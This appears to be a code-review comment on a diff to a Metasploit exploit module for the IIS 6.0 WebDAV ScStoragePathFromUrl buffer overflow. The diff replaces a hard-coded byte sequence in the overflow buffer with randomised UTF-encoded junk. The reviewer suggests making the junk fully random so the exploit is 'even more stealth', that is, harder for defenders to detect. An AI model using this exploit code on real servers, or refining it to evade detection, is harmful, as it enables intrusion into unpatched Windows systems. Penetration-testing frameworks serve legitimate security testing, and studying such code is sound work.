modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb

```diff
@@ -139,14 +184,41 @@ def exploit
     min_path_len.upto(max_path_len) do |path_len|
       vprint_status("Trying path length of #{path_len}...")
 
+      junk = rand_text_alpha(2)
+
       begin
         buf1 = "<#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
+        buf1 << utf_encode_str(junk * 16)
```

Comment:
can we make this smth like this?
```
def make_junk(len):
    return utf_encode_str(rand_text_alpha(len))

buf1 << make_junk(32)
```

This way we would be even more stealth. Or is there any need for the 2 characters to repeat?